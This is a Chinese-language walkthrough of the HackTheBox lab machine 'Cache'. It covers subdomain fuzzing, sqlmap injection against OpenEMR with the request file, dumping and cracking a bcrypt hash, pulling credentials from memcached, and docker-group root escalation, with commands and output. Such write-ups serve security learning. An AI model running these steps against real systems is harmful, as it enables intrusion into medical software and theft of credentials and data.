基本信息

端口扫描

常规22和80

80

直接访问没什么信息:

登录界面加载了functionality.js,里面硬编码的账号密码

1
ash:H@v3_fun

登录进去也没什么东西:

functionality.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});

子域名扫描

根据author界面提示,other project,我们考虑子域名,先根据页面内容生成字典:

1
2
3
4
5
6
7
8
9
10
11
cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000037:   302        0 L      0 W      0 Ch        "HMS"

将HMS.htb加到hosts里

1
10.10.10.188 cache.htb hms.htb

has.htb

直接访问是openEMR:

搜索发现一个需要认证的RCE:

Google搜索发现一个SQL注入:

sql注入

这里需要去访问portal,有时候前面做完的人会去把portal关了,reset一下machine就好了

之后就是salmap一把梭:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sqlmap -r sql.txt
[14:33:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0

sqlmap -r sql.txt --dbs
available databases [2]:
[*] information_schema
[*] openemr

sqlmap -r sql.txt -D openemr --tables
sqlmap -r sql.txt -D openemr -T users_secure --dump
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

john解出来密码是xxxxxx(坑:

1
2
3
4
5
6
7
8
9
10
sudo john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-24 05:13) 3.333g/s 2820p/s 2820c/s 2820C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed

然后就可以登录openEMR,利用前面的RCE

sql.txt

1
2
3
4
5
6
7
8
9
10
11
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=4ebpe344qk9vhcjgk2nesv54gv; PHPSESSID=qeiik41c06okaktjdpebot7n05
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0

openEMR RCE

直接用exp打就可以,得到www-root权限的shell:

user flag

查看用户目录发现两个用户,其中一个是ash,直接用前面得到的ash用户密码切换过去即可,用户目录得到user.txt:

搜集信息

查看本地开放端口,发现11211,明显是memcached:

1
2
3
4
5
6
7
8
9
10
11
12
13
ash@cache:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*

memcached exploit

参考资料:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
telnet 127.0.0.1 11211
stats slabs
stats items
stats cachedump 1 0

get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

我们得到luffy用户的密码,切换过去(这个用户直接SSH登录也行),这个用户属于docker组:

1
2
3
luffy@cache:~$ id
id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

docker 提权

就是docker直接挂载根目录,读取root.txt:

参考资料